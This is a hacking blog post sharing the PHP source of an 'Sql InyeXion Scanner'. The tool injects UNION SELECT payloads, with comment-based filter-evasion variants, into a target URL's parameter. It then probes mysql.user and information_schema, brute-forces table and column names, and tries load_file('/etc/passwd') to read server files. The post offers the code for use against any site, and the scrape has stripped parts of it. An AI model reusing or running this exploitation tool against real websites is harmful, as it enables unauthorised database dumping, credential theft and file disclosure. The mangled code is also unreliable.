[SOURCE][PHP] Sql InyeXion Scanner | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

[SOURCE][PHP] Sql InyeXion Scanner



Demo: http://www.upperbasement.com/STMB/
PHP Code:
@set_time_limit(0);/*
F-Security - Sql InyeXion Scanner v1
Desarrollado por Knet
Adminitradores - www.remoteexecution.org
Contacto:
Keynet.security@Gmail.com [ Mail ]
Keynet.security@Hotmail.com [ Msn ]
*/
$web=$_POST['web'];$end=$_POST['end'];$scann=$_POST['scann'];$union=$_POST['union'];$max=$_POST['max'];$from_format=$_POST['from'];$MySqluser=$_POST['MySqluser'];$InforMationSchema=$_POST['InforMationSchema'];$TblBrt=$_POST['TblBrt'];$TblFormat=$_POST['TblFormat'];$ColBrt=$_POST['ColBrt'];$ColFormat=$_POST['ColFormat'];$LdFl=$_POST['LdFl'];$string='err0r';$union_array=array('-1+UNION+SELECT+','-1\'+UNION+SELECT+','-1+UNION+ALL+SELECT+','-1\'+UNION+ALL+SELECT+','-1/**/UNION/**/SELECT/**/','-1\'/**/UNION/**/SELECT/**/','-1/**/UNION/**/ALL/**/SELECT/**/','-1\'/**/UNION/**/ALL/**/SELECT/**/','1+UNION+SELECT+','1\'+UNION+SELECT+','1+UNION+ALL+SELECT+','1\'+UNION+ALL+SELECT+','1/**/UNION/**/SELECT/**/','1\'/**/UNION/**/SELECT/**/','1/**/UNION/**/ALL/**/SELECT/**/','1\'/**/UNION/**/ALL/**/SELECT/**/');$count_union_array=count($union_array) + 1;$from_array=array('+from+','/**/from/**/','+FROM+','/**/FROM/**/','%20from%20','%20FROM%20');$count_from_array=count($from_array) + 1;$from=$from_array[$from_format];$iny_1=$union_array[$union];$iny_2='0x'.bin2hex($string);$iny_3='0x'.bin2hex($string);
if(
$max<|| $max=="" || !is_numeric($max))
{
$max=3;
}
?>

Sql InyeXion Scanner F-Security Team

Web:

if($web!=""){echo htmlentities($web);}else{echo 'http://www.site.com/news.php?id=';} ?>" size="60">
Union*:

for($union_for=0;$union_for<=$count_union_array;$union_for++)
{
if(
$union_array[$union_for]!="")
{
echo 
'.$union_for.'">'.$union_array[$union_for].''."\n";
}
}
?>
Max columns:

for($max_a=1;$max_a<=255;$max_a++)
{
echo 
'.$max_a.'">'.$max_a.''."\n";
}
?>
eND:

if($end!=""){echo htmlentities($end);}else{echo '--';} ?>" size="10">

From* Format:

for($from_for=0;$from_for<=$count_from_array;$from_for++)
{
if(
$from_array[$from_for]!="")
{
echo 
'.$from_for.'">'.$from_array[$from_for].''."\n";
}
}
?>

Test mysql.user: Yes No
Test information_schema: Yes No
Tables BruteForce: Yes No | tablename | TableName | TABLENAME
Columns BruteForce: Yes No | columname | ColumName | COLUMNAME
Test load_file(): Yes No


if(isset($scann) && $web!="")
{
for(
$a_for=1;$a_for<=$max;$a_for++)
{
$iny_2=$iny_2.'2d'.bin2hex($a_for);$iny=$web.$iny_1.$iny_2;$webmas $iny;$contenido = @file_get_contents($webmas.$end);$alert strpos($contenido,$string);
if(!
$alert)
{
$iny_2=$iny_2.','.$iny_3;$iny_vuln .= $a_for.',';
}
else
{
$f_num=$a_for;$web_final=$web.$iny_1.$iny_vuln.$f_num;//echo $webmas;echo '[+] Bug Found in: '.$a_for."
"
.'.htmlentities($web_final.$end).'" TARGET=BLANK>'.htmlentities($web_final.$end).''."
"
;
echo 
'vuln in num/s: |';/*********************************SALVANDO***************************************/$_SESSION['all_saveds'] .= '[+] Bug Found in: '.$a_for."
"
.'.htmlentities($web_final.$end).'" TARGET=BLANK>'.htmlentities($web_final.$end).''."
"
.'vuln in num/s: |';/*********************************SALVANDO***************************************/$vulns=array();
for(
$search_for=1;$search_for<=$a_for;$search_for++)
{
if(
strpos($contenido,$string.'-'.$search_for))
{
echo 
$search_for.'|';/*********************************SALVANDO**********************
*****************/
$_SESSION['all_saveds'] .= $search_for.'|';/*********************************SALVANDO**********************
*****************/
array_push($vulns,$search_for);
}
}
/*********************************SALVANDO***************************************/$_SESSION['all_saveds'] .= "
"
.'---------------------------------------------'.'------------------------------------------------'."
"
;/*********************************SALVANDO***************************************/echo "
"
.'---------------------------------------------'.'------------------------------------------------'."
"
;$a_for=$max;define('vuln','yes');
}
if(!
$alert && $a_for==$max)
{
echo 
'no vuln in 1->'.$max."\n";
}
$contenido='';
}
}
/* FINAL SIMPLE SCANN */if(vuln=="yes" && isset($MySqluser) && $MySqluser=="S")
{
$from_mysql_user=$from.'mysql.user';$contenido = @file_get_contents($webmas.$from_mysql_user.$end);$alert_mysql_user strpos($contenido,$string);
if(
$alert_mysql_user)
{
echo 
'[+] MySQL Database Found:'.'
'
;
echo 
'.htmlentities($web_final.$from_mysql_user.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_mysql_user.$end).''."
"
;
echo 
'[+] Columns default in mysql.user: Host,User,Password'.'
'
;
}
else
{
echo 
'[+] MySQL Database not Found:'.'
'
;
}
echo 
'-------------------------------'."
"
;
}
/* FINAL Mysql.user TEST */if(vuln=="yes" && isset($InforMationSchema) && $InforMationSchema=="S")
{
$from_information_schema=$from.'information_schema.tables';$contenido = @file_get_contents($webmas.$from_information_schema.$end);$alert_information_schema strpos($contenido,$string);
if(
$alert_information_schema)
{
echo 
'[+] Information_Schema Database Found:'.'
'
;
echo 
'.htmlentities($web_final.$from_information_schema.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_information_schema.$end).''."
"
;
echo 
'[+] Columns default in information_schema.tables: TABLE_SCHEMA,TABLE_NAME'.'
'
;
echo 
'---------------'."
"
;
echo 
'[+] Columns default in information_schema.columns:
TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME'
.'
'
;
}
else
{
echo 
'[+] Information_Schema Database not Found:'.'
'
;
}
echo 
'-------------------------------'."
"
;
}
/* FINAL information_schema database */if(vuln=="yes" && isset($TblBrt) && $TblBrt=="S" && isset($TblFormat))
{
switch(
$TblFormat)
{
case 
1:$file_txt_tables='1.txt';
break;
case 
2:$file_txt_tables='2.txt';
break;
case 
3:$file_txt_tables='3.txt';
break;
default:
$file_txt_tables='1.txt';
}
$file_tables=@file($file_txt_tables);$count_tables=count($file_tables);
for(
$t_for=0;$t_for<=$count_tables;$t_for++)
{
$file_tables[$t_for]=trim($file_tables[$t_for]);
if(
$file_tables[$t_for] != "")
{
$from_table=$from.$file_tables[$t_for];$contenido = @file_get_contents($webmas.$from_table.$end);$alert_table strpos($contenido,$string);
if(
$alert_table)
{
echo 
'[+] Table Found: '.$file_tables[$t_for]."
"
;
echo 
'.htmlentities($web_final.$from_table.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_table.$end).''."
"
;/*
echo 'webmas:'.$webmas.'
';
echo 'webfinal:'.$web_final.'
';
echo 'web:'.$web.'
';
*/
if(isset($ColBrt) && $ColBrt=="S" && isset($ColFormat))
{
/****************************************************************
*******/
switch($ColFormat)
{
case 
1:$file_txt_columns='1.txt';
break;
case 
2:$file_txt_columns='2.txt';
break;
case 
3:$file_txt_columns='3.txt';
break;
default:
$file_txt_columns='1.txt';
}
$file_columns=@file($file_txt_columns);$count_columns=count($file_columns);$count_vulns=count($vulns);$count_vulns $count_vulns 1;
for(
$c_for=0;$c_for<=$count_columns;$c_for++)
{
$file_columns[$c_for]=trim($file_columns[$c_for]);
if(
$file_columns[$c_for] != "")
{
for(
$cols_for=1;$cols_for<=$f_num;$cols_for++)
{
if(
in_array($cols_for,$vulns))
{
if(
$cols_for != $f_num)
{
$cols_brt_string .= 'concat(0x'.bin2hex($string).','.$file_columns[$c_for].'),';
}
else
{
$cols_brt_string .= 'concat(0x'.bin2hex($string).','.$file_columns[$c_for].')';
}
}
else
{
if(
$cols_for != $f_num)
{
$cols_brt_string .= $cols_for.',';
}
else
{
$cols_brt_string .= $cols_for;
}
}
}
$col_contenido=@file_get_contents($web.$iny_1.$cols_brt_string.$from_table.$end);$alert_col strpos($col_contenido,$string);
if(
$alert_col)
{
if(
$cols_vulns=="")
{
$cols_vulns =$file_columns[$c_for];
}
else
{
$cols_vulns .= ','.$file_columns[$c_for];
}
/*
$cols_brt_string=str_replace('concat(0x'.bin2hex($string).',','',
$cols_brt_string);
$cols_brt_string=str_replace(')','',
$cols_brt_string);
echo '[+] Column Found in '.
$file_tables[$t_for].
': '.$file_columns[$c_for].'
';
echo '
htmlentities($web.
$iny_1.$cols_brt_string.$from_table.$end).'" TARGET=BLANK>'.
htmlentities($web.
$iny_1.$cols_brt_string.$from_table.$end).''."
";
*/
}$cols_brt_string='';
}
/**/}
if(
$cols_vulns!="")
{
echo 
'[+] Column/s Found in '.$file_tables[$t_for].' : '.$cols_vulns.'
'
;$cols_vulns='';
}
/****************************************************************
*******/
}
echo 
'-------------------------------'."
"
;
}
}
}
}
/* FINAL TABLE AND COLUMNS BRUTEFORCE */if(vuln=="yes" && isset($LdFl) && $LdFl=="S")
{
$string_alert_loadfile 'root:x:';
for(
$load_file_for=1;$load_file_for<=$f_num;$load_file_for++)
{
if(
in_array($load_file_for,$vulns) && load_file!="yes")
{
if(
$load_file_for != $f_num)
{
$load_file_string .= 'load_file(0x'.bin2hex('/etc/passwd').')'.',';
}
else
{
$load_file_string .= 'load_file('.$load_file_for.')';
}
define('load_file','yes');
}
else
{
if(
$load_file_for != $f_num)
{
$load_file_string .= $load_file_for.',';
}
else
{
$load_file_string .= $load_file_for;
}
}
}
$web_load=$web.$iny_1.$load_file_string.$end;$contenido_load = @file_get_contents($web_load);$alert_load_file strpos($contenido_load,$string_alert_loadfile);
echo 
'[+] load_file(): ';
if(
$alert_load_file)
{
echo 
'ENABLED'.'
'
;
echo 
'.htmlentities($web_load).'" TARGET=BLANK>'.htmlentities($web_load).''."
"
;
}
else
{
echo 
'DISABLED'.'
'
;
}
echo 
'-------------------------------'."
"
;
}
/* FINAL LOAD_FILE() TEST */?>




Share your views...

0 Respones to "[SOURCE][PHP] Sql InyeXion Scanner"

Post a Comment

 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com